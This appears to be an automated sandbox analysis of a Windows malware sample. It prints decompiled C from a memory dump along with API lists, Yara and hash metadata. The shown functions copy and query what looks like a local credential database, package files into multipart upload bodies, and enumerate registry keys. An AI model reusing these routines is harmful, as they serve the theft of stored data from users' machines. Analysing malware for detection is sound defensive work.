                                                                                                                              0x0041e5e0
                                                                                                                              0x00000000
                                                                                                                              0x0041e5e0
                                                                                                                              0x0041e2a9
                                                                                                                              0x0041e2ab
                                                                                                                              0x0041e2ae
                                                                                                                              0x00000000
                                                                                                                              0x0041e2ae
                                                                                                                              0x0041e5f0
                                                                                                                              0x0041e5f1
                                                                                                                              0x0041e5f6
                                                                                                                              0x0041e5f6
                                                                                                                              0x0041e1ac
                                                                                                                              0x0041e5fd
                                                                                                                              0x0041e60a
                                                                                                                              0x0041e610
                                                                                                                              0x0041e61a
                                                                                                                              0x0041e623
                                                                                                                              0x0041e62e
                                                                                                                              0x0041e638

                                                                                                                              APIs
                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,0E687535), ref: 0041E117
                                                                                                                              • lstrcat.KERNEL32(?,02336800), ref: 0041E12B
                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0041E13E
                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0041E61A
                                                                                                                                • Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8
                                                                                                                                • Part of subcall function 0041D730: _memset.LIBCMT ref: 0041D7A4
                                                                                                                                • Part of subcall function 0041D730: LocalAlloc.KERNEL32(00000040,?), ref: 0041D7F3
                                                                                                                              • _fprintf.LIBCMT ref: 0041E377
                                                                                                                              • _fprintf.LIBCMT ref: 0041E38B
                                                                                                                              • _fprintf.LIBCMT ref: 0041E3A5
                                                                                                                              • _fprintf.LIBCMT ref: 0041E3B9
                                                                                                                              • _fprintf.LIBCMT ref: 0041E3D6
                                                                                                                              • _fprintf.LIBCMT ref: 0041E3EA
                                                                                                                              • _fprintf.LIBCMT ref: 0041E406
                                                                                                                              • _fprintf.LIBCMT ref: 0041E476
                                                                                                                              • _fprintf.LIBCMT ref: 0041E492
                                                                                                                              • _fprintf.LIBCMT ref: 0041E41A
                                                                                                                                • Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
                                                                                                                                • Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
                                                                                                                                • Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
                                                                                                                                • Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7
                                                                                                                              • _fprintf.LIBCMT ref: 0041E4B0
                                                                                                                              • _fprintf.LIBCMT ref: 0041E4C4
                                                                                                                              • _fprintf.LIBCMT ref: 0041E4DE
                                                                                                                              • _fprintf.LIBCMT ref: 0041E4F2
                                                                                                                              • _fprintf.LIBCMT ref: 0041E50F
                                                                                                                              • _fprintf.LIBCMT ref: 0041E523
                                                                                                                              • _fprintf.LIBCMT ref: 0041E53F
                                                                                                                              • _fprintf.LIBCMT ref: 0041E553
                                                                                                                              • _fprintf.LIBCMT ref: 0041E5AF
                                                                                                                              • _fprintf.LIBCMT ref: 0041E5CB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _fprintf$File$AllocCopyCurrentDeleteDirectoryLocal__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcat
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3148340754-0
                                                                                                                              • Opcode ID: 3e36b04aaf01437d1d0c533f3c43608551969b2149bde5ab757ed3e88d35e922
                                                                                                                              • Instruction ID: b28846bd6424f20ce2a9d3b9ec4ba7a1ca7f8e05558c29a70d2fe02686c8bc3e
                                                                                                                              • Opcode Fuzzy Hash: 3e36b04aaf01437d1d0c533f3c43608551969b2149bde5ab757ed3e88d35e922
                                                                                                                              • Instruction Fuzzy Hash: A1E180B1E00218AFCB14DFA5DD45BDBB7B5BB58300F0481A9F509A7281D7799E84CF94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041E0E0, Relevance: 33.4, APIs: 22, Instructions: 367fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 47%
                                                                                                                              			E0041E0E0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v352;
				intOrPtr _v356;
				intOrPtr* _v360;
				intOrPtr _v364;
				char _v392;
				intOrPtr* _v396;
				intOrPtr* _v400;
				char _v401;
				char _v402;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr* _v416;
				intOrPtr* _v420;
				char _v421;
				char _v422;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				void* __ebp;
				signed int _t123;
				signed int _t124;
				void* _t132;
				int _t133;
				void* _t136;
				intOrPtr _t141;
				void* _t142;
				void* _t148;
				intOrPtr* _t152;
				void* _t167;
				intOrPtr* _t177;
				void* _t192;
				void* _t201;
				char _t215;
				char _t228;
				char _t240;
				char _t241;
				void* _t272;
				void* _t273;
				signed int _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t281;

				_t273 = __esi;
				_t272 = __edi;
				_t201 = __ebx;
				_t123 =  *0x4301f4; // 0xe687535
				_t124 = _t123 ^ _t274;
				_v20 = _t124;
				 *[fs:0x0] =  &_v16;
				 *0x43285c(0x104,  &_v352, _t124,  *[fs:0x0], E004265BC, 0xffffffff);
				 *0x4328c4( &_v352,  *0x432400);
				CopyFileA(_a8,  &_v352, 1); // executed
				_v84 =  *0x432158;
				_t132 =  *0x432750( &_v352,  &_v80); // executed
				_t277 = _t275 - 0x1a8 + 8;
				if(_t132 == 0) {
					_t136 =  *0x432700(_v80, _v84, 0xffffffff,  &_v88, 0);
					_t278 = _t277 + 0x14;
					if(_t136 == 0) {
						_t141 = E004055AB( *0x4325d0,  *0x432188); // executed
						_t278 = _t278 + 8;
						_v356 = _t141;
						if(_v356 != 0) {
							while(1) {
								L3:
								_t142 =  *0x432720(_v88);
								_t281 = _t278 + 4;
								if(_t142 != 0x64) {
									break;
								}
								_v364 =  *0x43273c(_v88, 0);
								_v360 =  *0x43273c(_v88, 1);
								_t148 =  *0x43272c(_v88, 2, _a16, _a20);
								E0041D730(_t201,  &_v392,  *0x432734(), _v88, 2, _t148);
								_t278 = _t281 + 0x34;
								_v8 = 0;
								_v396 = 0x42942e;
								_v400 = E00401330( &_v392);
								while(1) {
									_t152 = _v400;
									_t215 =  *_t152;
									_v401 = _t215;
									if(_t215 !=  *_v396) {
										break;
									}
									if(_v401 == 0) {
										L9:
										_v408 = 0;
									} else {
										_t152 = _v400;
										_t241 =  *((intOrPtr*)(_t152 + 1));
										_v402 = _t241;
										_t37 = _v396 + 1; // 0x69620a00
										if(_t241 !=  *_t37) {
											break;
										} else {
											_v400 = _v400 + 2;
											_v396 = _v396 + 2;
											if(_v402 != 0) {
												continue;
											} else {
												goto L9;
											}
										}
									}
									L11:
									_v412 = _v408;
									if(_v412 != 0) {
										E004055C2(_t201, _t272, _t273, __eflags);
										E004055C2(_t201, _t272, _t273, __eflags);
										E004055C2(_t201, _t272, _t273, __eflags);
										E004055C2(_t201, _t272, _t273, __eflags);
										E004055C2(_t201, _t272, _t273, __eflags);
										E004055C2(_t201, _t272, _t273, __eflags);
										E004055C2(_t201, _t272, _t273, __eflags);
										E004055C2(_t201, _t272, _t273, __eflags);
										_t167 =  *0x43272c(_v88, 2, _a16, _a20, _v356, "\n", _v356,  *0x4322b4, _v360, _v356, "\n", _v356,  *0x432258, _v364, _v356, "\n", _v356,  *0x4323b8, _a12, _v356, "\n", _v356,  *0x43239c, _a4);
										_v440 = E0041D730(_t201,  &_v76,  *0x432734(), _v88, 2, _t167);
										_push(E00401330(_v440));
										_push( *0x4326c4);
										_push(_v356);
										E004055C2(_t201, _t272, _t273, __eflags);
										E004012D0( &_v76);
										_push("\n\n");
										_push(_v356);
										E004055C2(_t201, _t272, _t273, __eflags);
										_t278 = _t278 + 0x88;
									} else {
										_v416 = 0x42942f;
										_v420 = _v360;
										while(1) {
											_t177 = _v420;
											_t228 =  *_t177;
											_v421 = _t228;
											if(_t228 !=  *_v416) {
												break;
											}
											if(_v421 == 0) {
												L17:
												_v428 = 0;
											} else {
												_t177 = _v420;
												_t240 =  *((intOrPtr*)(_t177 + 1));
												_v422 = _t240;
												_t59 = _v416 + 1; // 0x7469620a
												if(_t240 !=  *_t59) {
													break;
												} else {
													_v420 = _v420 + 2;
													_v416 = _v416 + 2;
													if(_v422 != 0) {
														continue;
													} else {
														goto L17;
													}
												}
											}
											L19:
											_v432 = _v428;
											if(_v432 != 0) {
												E004055C2(_t201, _t272, _t273, __eflags);
												E004055C2(_t201, _t272, _t273, __eflags);
												E004055C2(_t201, _t272, _t273, __eflags);
												E004055C2(_t201, _t272, _t273, __eflags);
												E004055C2(_t201, _t272, _t273, __eflags);
												E004055C2(_t201, _t272, _t273, __eflags);
												E004055C2(_t201, _t272, _t273, __eflags);
												E004055C2(_t201, _t272, _t273, __eflags);
												_t192 =  *0x43272c(_v88, 2, _a16, _a20, _v356, "\n", _v356,  *0x4322b4, _v360, _v356, "\n", _v356,  *0x432258, _v364, _v356, "\n", _v356,  *0x4323b8, _a12, _v356, "\n", _v356,  *0x43239c, _a4);
												_v436 = E0041D730(_t201,  &_v48,  *0x432734(), _v88, 2, _t192);
												_push(E00401330(_v436));
												_push( *0x4326c4);
												_push(_v356);
												E004055C2(_t201, _t272, _t273, __eflags);
												E004012D0( &_v48);
												_push("\n\n");
												_push(_v356);
												E004055C2(_t201, _t272, _t273, __eflags);
												_t278 = _t278 + 0x88;
											}
											goto L24;
										}
										asm("sbb eax, eax");
										asm("sbb eax, 0xffffffff");
										_v428 = _t177;
										goto L19;
									}
									L24:
									_v8 = 0xffffffff;
									E004012D0( &_v392);
									goto L3;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								_v408 = _t152;
								goto L11;
							}
							_push(_v356); // executed
							E00405EA3(_t201, _v356, _t272, _t273, __eflags); // executed
							_t278 = _t281 + 4;
						}
					}
					 *0x432724(_v88);
					 *0x432754(_v80);
				}
				_t133 = DeleteFileA( &_v352); // executed
				 *[fs:0x0] = _v16;
				__eflags = _v20 ^ _t274;
				return E00404354(_t133, _t201, _v20 ^ _t274,  &_v352, _t272, _t273);
			}























































                                                                                                                              0x0041e0e0
                                                                                                                              0x0041e0e0
                                                                                                                              0x0041e0e0
                                                                                                                              0x0041e0f7
                                                                                                                              0x0041e0fc
                                                                                                                              0x0041e0fe
                                                                                                                              0x0041e105
                                                                                                                              0x0041e117
                                                                                                                              0x0041e12b
                                                                                                                              0x0041e13e
                                                                                                                              0x0041e14a
                                                                                                                              0x0041e158
                                                                                                                              0x0041e15e
                                                                                                                              0x0041e163
                                                                                                                              0x0041e179
                                                                                                                              0x0041e17f
                                                                                                                              0x0041e184
                                                                                                                              0x0041e197
                                                                                                                              0x0041e19c
                                                                                                                              0x0041e19f
                                                                                                                              0x0041e1ac
                                                                                                                              0x0041e1b2
                                                                                                                              0x0041e1b2
                                                                                                                              0x0041e1b6
                                                                                                                              0x0041e1bc
                                                                                                                              0x0041e1c2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e1d7
                                                                                                                              0x0041e1ec
                                                                                                                              0x0041e200
                                                                                                                              0x0041e221
                                                                                                                              0x0041e226
                                                                                                                              0x0041e229
                                                                                                                              0x0041e230
                                                                                                                              0x0041e245
                                                                                                                              0x0041e24b
                                                                                                                              0x0041e24b
                                                                                                                              0x0041e251
                                                                                                                              0x0041e253
                                                                                                                              0x0041e261
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e26a
                                                                                                                              0x0041e29d
                                                                                                                              0x0041e29d
                                                                                                                              0x0041e26c
                                                                                                                              0x0041e26c
                                                                                                                              0x0041e272
                                                                                                                              0x0041e275
                                                                                                                              0x0041e281
                                                                                                                              0x0041e284
                                                                                                                              0x00000000
                                                                                                                              0x0041e286
                                                                                                                              0x0041e286
                                                                                                                              0x0041e28d
                                                                                                                              0x0041e29b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e29b
                                                                                                                              0x0041e284
                                                                                                                              0x0041e2b4
                                                                                                                              0x0041e2ba
                                                                                                                              0x0041e2c7
                                                                                                                              0x0041e4b0
                                                                                                                              0x0041e4c4
                                                                                                                              0x0041e4de
                                                                                                                              0x0041e4f2
                                                                                                                              0x0041e50f
                                                                                                                              0x0041e523
                                                                                                                              0x0041e53f
                                                                                                                              0x0041e553
                                                                                                                              0x0041e569
                                                                                                                              0x0041e58f
                                                                                                                              0x0041e5a0
                                                                                                                              0x0041e5a7
                                                                                                                              0x0041e5ae
                                                                                                                              0x0041e5af
                                                                                                                              0x0041e5ba
                                                                                                                              0x0041e5bf
                                                                                                                              0x0041e5ca
                                                                                                                              0x0041e5cb
                                                                                                                              0x0041e5d0
                                                                                                                              0x0041e2cd
                                                                                                                              0x0041e2cd
                                                                                                                              0x0041e2dd
                                                                                                                              0x0041e2e3
                                                                                                                              0x0041e2e3
                                                                                                                              0x0041e2e9
                                                                                                                              0x0041e2eb
                                                                                                                              0x0041e2f9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e302
                                                                                                                              0x0041e335
                                                                                                                              0x0041e335
                                                                                                                              0x0041e304
                                                                                                                              0x0041e304
                                                                                                                              0x0041e30a
                                                                                                                              0x0041e30d
                                                                                                                              0x0041e319
                                                                                                                              0x0041e31c
                                                                                                                              0x00000000
                                                                                                                              0x0041e31e
                                                                                                                              0x0041e31e
                                                                                                                              0x0041e325
                                                                                                                              0x0041e333
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e333
                                                                                                                              0x0041e31c
                                                                                                                              0x0041e34c
                                                                                                                              0x0041e352
                                                                                                                              0x0041e35f
                                                                                                                              0x0041e377
                                                                                                                              0x0041e38b
                                                                                                                              0x0041e3a5
                                                                                                                              0x0041e3b9
                                                                                                                              0x0041e3d6
                                                                                                                              0x0041e3ea
                                                                                                                              0x0041e406
                                                                                                                              0x0041e41a
                                                                                                                              0x0041e430
                                                                                                                              0x0041e456
                                                                                                                              0x0041e467
                                                                                                                              0x0041e46e
                                                                                                                              0x0041e475
                                                                                                                              0x0041e476
                                                                                                                              0x0041e481
                                                                                                                              0x0041e486
                                                                                                                              0x0041e491
                                                                                                                              0x0041e492
                                                                                                                              0x0041e497
                                                                                                                              0x0041e497
                                                                                                                              0x00000000
                                                                                                                              0x0041e49a
                                                                                                                              0x0041e341
                                                                                                                              0x0041e343
                                                                                                                              0x0041e346
                                                                                                                              0x00000000
                                                                                                                              0x0041e346
                                                                                                                              0x0041e5d3
                                                                                                                              0x0041e5d3
                                                                                                                              0x0041e5e0
                                                                                                                              0x00000000
                                                                                                                              0x0041e5e0
                                                                                                                              0x0041e2a9
                                                                                                                              0x0041e2ab
                                                                                                                              0x0041e2ae
                                                                                                                              0x00000000
                                                                                                                              0x0041e2ae
                                                                                                                              0x0041e5f0
                                                                                                                              0x0041e5f1
                                                                                                                              0x0041e5f6
                                                                                                                              0x0041e5f6
                                                                                                                              0x0041e1ac
                                                                                                                              0x0041e5fd
                                                                                                                              0x0041e60a
                                                                                                                              0x0041e610
                                                                                                                              0x0041e61a
                                                                                                                              0x0041e623
                                                                                                                              0x0041e62e
                                                                                                                              0x0041e638

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _fprintf$File$CopyDelete__fsopen__ftbuf__lock_file__output_l__stbuf_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3854021140-0
                                                                                                                              • Opcode ID: 3e36b04aaf01437d1d0c533f3c43608551969b2149bde5ab757ed3e88d35e922
                                                                                                                              • Instruction ID: b28846bd6424f20ce2a9d3b9ec4ba7a1ca7f8e05558c29a70d2fe02686c8bc3e
                                                                                                                              • Opcode Fuzzy Hash: 3e36b04aaf01437d1d0c533f3c43608551969b2149bde5ab757ed3e88d35e922
                                                                                                                              • Instruction Fuzzy Hash: A1E180B1E00218AFCB14DFA5DD45BDBB7B5BB58300F0481A9F509A7281D7799E84CF94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004218C0, Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 239fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 91%
                                                                                                                              			E004218C0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, CHAR* _a8) {
				struct _OVERLAPPED* _v8;
				char _v16;
				signed int _v20;
				char _v48;
				intOrPtr _v52;
				long _v56;
				char _v84;
				char _v112;
				void* _v116;
				long _v120;
				void* _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				signed int _t94;
				signed int _t95;
				int _t98;
				signed char _t120;
				signed char _t122;
				signed char _t123;
				signed char _t125;
				intOrPtr _t142;
				void* _t155;
				signed int _t195;
				intOrPtr _t217;
				void* _t223;
				void* _t224;
				signed int _t225;

				_t224 = __esi;
				_t223 = __edi;
				_t211 = __edx;
				_t155 = __ebx;
				_push(0xffffffff);
				_push(E00426522);
				_push( *[fs:0x0]);
				_t94 =  *0x4301f4; // 0xe687535
				_t95 = _t94 ^ _t225;
				_v20 = _t95;
				_push(_t95);
				 *[fs:0x0] =  &_v16;
				_v124 = __ecx;
				_t98 = CreateFileA(_a8, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v116 = _t98;
				if(_v116 != 0xffffffff) {
					_v56 = GetFileSize(_v116, 0);
					__eflags = _v56 - 1;
					if(_v56 >= 1) {
						E004011C0( &_v112, _a8);
						_v8 = 0;
						_v52 = E00401F10( &_v112, 0x5c, E00401350( &_v112) - 1) + 1;
						_v128 = E00401F30( &_v112,  &_v48, _v52, E00401350( &_v112) - _v52);
						_v132 = _v128;
						_v8 = 1;
						E00401E70( &_v112, _v132);
						_v8 = 0;
						E004012D0( &_v48);
						_v52 = E00401F10( &_v112, 0x2e, E00401350( &_v112) - 1) + 1;
						E00401F30( &_v112,  &_v84, _v52, E00401350( &_v112) - _v52);
						_v8 = 2;
						_t120 = E00402C70( &_v84, "jpg");
						__eflags = _t120 & 0x000000ff;
						if((_t120 & 0x000000ff) == 0) {
							_t122 = E00402C70( &_v84, "gif");
							__eflags = _t122 & 0x000000ff;
							if((_t122 & 0x000000ff) == 0) {
								_t123 = E00402C70( &_v84, "png");
								__eflags = _t123 & 0x000000ff;
								if((_t123 & 0x000000ff) == 0) {
									_t125 = E00402C70( &_v84, "tiff");
									__eflags = _t125 & 0x000000ff;
									if((_t125 & 0x000000ff) != 0) {
										_t125 = E00401EA0( &_v84, "image/tiff");
									}
								} else {
									_t125 = E00401EA0( &_v84, "image/png");
								}
							} else {
								_t125 = E00401EA0( &_v84, "image/gif");
							}
						} else {
							_t125 = E00401EA0( &_v84, "image/jpeg");
						}
						E00421740(_t125, _v124, "--");
						E00421740(E00421740(E00421740(E00421740(E00421740(_v124 + 0x10, _v124, _v124 + 0x10), _v124, "\r\n"), _v124, "Content-Disposition: form-data; name=\""), _v124, _a4), _v124, "\"; filename=\"");
						E00421740(E00421740(E00421740(E00401330( &_v112), _v124, _t134), _v124, "\"\r\n"), _v124, "Content-Type: ");
						E00421740(E00421740(E00421740(E00401330( &_v84), _v124, _t138), _v124, "\r\n"), _v124, "\r\n");
						_t217 = _v124;
						_t142 = _v124;
						__eflags =  *((intOrPtr*)(_t217 + 4)) -  *((intOrPtr*)(_t142 + 8)) - 1 - _v56;
						if( *((intOrPtr*)(_t217 + 4)) -  *((intOrPtr*)(_t142 + 8)) - 1 < _v56) {
							__eflags = _v56 -  *((intOrPtr*)(_v124 + 4)) -  *(_v124 + 8) - 1;
							E004214F0(_v124, _t223, _t224, _v56 -  *((intOrPtr*)(_v124 + 4)) -  *(_v124 + 8) - 1, _v56 -  *((intOrPtr*)(_v124 + 4)) -  *(_v124 + 8) - 1);
						}
						ReadFile(_v116,  *_v124 +  *(_v124 + 8), _v56,  &_v120, 0); // executed
						_t195 =  *(_v124 + 8) + _v120;
						__eflags = _t195;
						_t211 = _v124;
						 *(_v124 + 8) = _t195;
						E00421740(CloseHandle(_v116), _v124, "\r\n");
						_v8 = 0;
						E004012D0( &_v84);
						_v8 = 0xffffffff;
						_t98 = E004012D0( &_v112);
					} else {
						_t211 = _v116;
						_t98 = CloseHandle(_v116);
					}
				}
				 *[fs:0x0] = _v16;
				return E00404354(_t98, _t155, _v20 ^ _t225, _t211, _t223, _t224);
			}






























                                                                                                                              0x004218c0
                                                                                                                              0x004218c0
                                                                                                                              0x004218c0
                                                                                                                              0x004218c0
                                                                                                                              0x004218c3
                                                                                                                              0x004218c5
                                                                                                                              0x004218d0
                                                                                                                              0x004218d4
                                                                                                                              0x004218d9
                                                                                                                              0x004218db
                                                                                                                              0x004218de
                                                                                                                              0x004218e2
                                                                                                                              0x004218e8
                                                                                                                              0x00421901
                                                                                                                              0x00421907
                                                                                                                              0x0042190e
                                                                                                                              0x00421921
                                                                                                                              0x00421924
                                                                                                                              0x00421928
                                                                                                                              0x00421940
                                                                                                                              0x00421945
                                                                                                                              0x00421965
                                                                                                                              0x00421984
                                                                                                                              0x0042198a
                                                                                                                              0x0042198d
                                                                                                                              0x00421998
                                                                                                                              0x0042199d
                                                                                                                              0x004219a4
                                                                                                                              0x004219c2
                                                                                                                              0x004219dc
                                                                                                                              0x004219e1
                                                                                                                              0x004219ee
                                                                                                                              0x004219f9
                                                                                                                              0x004219fb
                                                                                                                              0x00421a15
                                                                                                                              0x00421a20
                                                                                                                              0x00421a22
                                                                                                                              0x00421a3c
                                                                                                                              0x00421a47
                                                                                                                              0x00421a49
                                                                                                                              0x00421a63
                                                                                                                              0x00421a6e
                                                                                                                              0x00421a70
                                                                                                                              0x00421a7a
                                                                                                                              0x00421a7a
                                                                                                                              0x00421a4b
                                                                                                                              0x00421a53
                                                                                                                              0x00421a53
                                                                                                                              0x00421a24
                                                                                                                              0x00421a2c
                                                                                                                              0x00421a2c
                                                                                                                              0x004219fd
                                                                                                                              0x00421a05
                                                                                                                              0x00421a05
                                                                                                                              0x00421a87
                                                                                                                              0x00421ac9
                                                                                                                              0x00421af4
                                                                                                                              0x00421b1f
                                                                                                                              0x00421b24
                                                                                                                              0x00421b27
                                                                                                                              0x00421b33
                                                                                                                              0x00421b36
                                                                                                                              0x00421b4a
                                                                                                                              0x00421b50
                                                                                                                              0x00421b50
                                                                                                                              0x00421b6f
                                                                                                                              0x00421b7b
                                                                                                                              0x00421b7b
                                                                                                                              0x00421b7e
                                                                                                                              0x00421b81
                                                                                                                              0x00421b96
                                                                                                                              0x00421b9b
                                                                                                                              0x00421ba2
                                                                                                                              0x00421ba7
                                                                                                                              0x00421bb1
                                                                                                                              0x0042192a
                                                                                                                              0x0042192a
                                                                                                                              0x0042192e
                                                                                                                              0x0042192e
                                                                                                                              0x00421928
                                                                                                                              0x00421bb9
                                                                                                                              0x00421bce

                                                                                                                              APIs
                                                                                                                              • CreateFileA.KERNEL32(00421212,80000000,00000001,00000000,00000003,00000080,00000000,0E687535), ref: 00421901
                                                                                                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0042191B
                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0042192E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseCreateHandleSize
                                                                                                                              • String ID: "$"; filename="$Content-Disposition: form-data; name="$Content-Type: $gif$image/gif$image/jpeg$image/png$image/tiff$jpg$png$tiff
                                                                                                                              • API String ID: 1378416451-1458791827
                                                                                                                              • Opcode ID: 10895f6d1539fab828b2433fc796608f0f92dbda97f91a4d645635c244f2a767
                                                                                                                              • Instruction ID: 3bf615faab60dab94f8dcf7d9beea4d0e9600496abd0152c7296f5e1fc8068ae
                                                                                                                              • Opcode Fuzzy Hash: 10895f6d1539fab828b2433fc796608f0f92dbda97f91a4d645635c244f2a767
                                                                                                                              • Instruction Fuzzy Hash: 9E918E71A04118ABDB14EBA5EC91FEDB775BF54304FA0412EF402BB2E2DB786905CB58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041AC90, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 158registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 67%
                                                                                                                              			E0041AC90(void* __ebx, void* __edi, void* __esi) {
				int _v8;
				signed int _v12;
				char _v1036;
				char _v2060;
				void* _v2064;
				void* _v2068;
				int* _v2072;
				int _v2076;
				char _v3100;
				char _v203100;
				char* _v203104;
				int _v203108;
				intOrPtr* _v203112;
				intOrPtr _v203116;
				char _v203117;
				intOrPtr _v203124;
				signed int _t66;
				long _t71;
				char* _t73;
				long _t76;
				long _t80;
				long _t82;
				long _t89;
				void* _t98;
				char* _t99;
				char* _t108;
				char* _t115;
				void* _t128;
				void* _t129;
				signed int _t130;
				void* _t131;
				void* _t132;

				_t129 = __esi;
				_t128 = __edi;
				_t98 = __ebx;
				E00412A40(0x31970);
				_t66 =  *0x4301f4; // 0xe687535
				_v12 = _t66 ^ _t130;
				E004091C0( &_v203100, 0, 0x30d40);
				_t132 = _t131 + 0xc;
				_v2068 = 0;
				_v2064 = 0;
				_t99 =  *0x43244c; // 0x23374a0
				_v203104 = _t99;
				_v2072 = 0;
				_v8 = 0xf003f;
				_v2076 = 0;
				_t117 =  &_v2068;
				_t71 = RegOpenKeyExA(0x80000002, _v203104, 0, 0x20019,  &_v2068); // executed
				if(_t71 == 0) {
					_v203108 = 0;
					while(_v2072 == 0) {
						_v2076 = 0x400;
						_t76 = RegEnumKeyExA(_v2068, _v203108,  &_v1036,  &_v2076, 0, 0, 0, 0); // executed
						_v2072 = _t76;
						if(_v2072 != 0) {
							L16:
							_v203108 = _v203108 + 1;
							continue;
						} else {
							wsprintfA( &_v2060, "%s\\%s", _v203104,  &_v1036);
							_t132 = _t132 + 0x10;
							_t80 = RegOpenKeyExA(0x80000002,  &_v2060, 0, 0x20019,  &_v2064); // executed
							if(_t80 == 0) {
								_v2076 = 0x400;
								_t108 =  *0x432678; // 0x2336ba8
								_t82 = RegQueryValueExA(_v2064, _t108, 0,  &_v8,  &_v3100,  &_v2076); // executed
								if(_t82 == 0) {
									_v203112 =  &_v3100;
									_v203116 = _v203112 + 1;
									do {
										_v203117 =  *_v203112;
										_v203112 = _v203112 + 1;
									} while (_v203117 != 0);
									_v203124 = _v203112 - _v203116;
									if(_v203124 > 1) {
										 *0x4328c4( &_v203100,  &_v3100);
										_v2076 = 0x400;
										_t115 =  *0x432418; // 0x2336bf0
										_t89 = RegQueryValueExA(_v2064, _t115, 0,  &_v8,  &_v3100,  &_v2076); // executed
										if(_t89 == 0) {
											 *0x4328c4( &_v203100, " ");
											 *0x4328c4( &_v203100,  &_v3100);
										}
										 *0x4328c4( &_v203100, "\n");
									}
								}
								RegCloseKey(_v2064);
								goto L16;
							} else {
								_t117 = _v2064;
								RegCloseKey(_v2064);
								RegCloseKey(_v2068);
								_t73 =  &_v203100;
							}
						}
						goto L18;
					}
					_t117 = _v2068;
					RegCloseKey(_v2068);
					_t73 =  &_v203100;
				} else {
					_t73 =  &_v203100;
				}
				L18:
				return E00404354(_t73, _t98, _v12 ^ _t130, _t117, _t128, _t129);
			}



































                                                                                                                              0x0041ac90
                                                                                                                              0x0041ac90
                                                                                                                              0x0041ac90
                                                                                                                              0x0041ac98
                                                                                                                              0x0041ac9d
                                                                                                                              0x0041aca4
                                                                                                                              0x0041acb5
                                                                                                                              0x0041acba
                                                                                                                              0x0041acbd
                                                                                                                              0x0041acc7
                                                                                                                              0x0041acd1
                                                                                                                              0x0041acd7
                                                                                                                              0x0041acdd
                                                                                                                              0x0041ace7
                                                                                                                              0x0041acee
                                                                                                                              0x0041acf8
                                                                                                                              0x0041ad12
                                                                                                                              0x0041ad1a
                                                                                                                              0x0041ad27
                                                                                                                              0x0041ad42
                                                                                                                              0x0041ad4f
                                                                                                                              0x0041ad7d
                                                                                                                              0x0041ad83
                                                                                                                              0x0041ad90
                                                                                                                              0x0041af23
                                                                                                                              0x0041ad3c
                                                                                                                              0x00000000
                                                                                                                              0x0041ad96
                                                                                                                              0x0041adb0
                                                                                                                              0x0041adb6
                                                                                                                              0x0041add3
                                                                                                                              0x0041addb
                                                                                                                              0x0041ae02
                                                                                                                              0x0041ae20
                                                                                                                              0x0041ae2e
                                                                                                                              0x0041ae36
                                                                                                                              0x0041ae42
                                                                                                                              0x0041ae51
                                                                                                                              0x0041ae57
                                                                                                                              0x0041ae5f
                                                                                                                              0x0041ae65
                                                                                                                              0x0041ae6c
                                                                                                                              0x0041ae81
                                                                                                                              0x0041ae8e
                                                                                                                              0x0041aea2
                                                                                                                              0x0041aea8
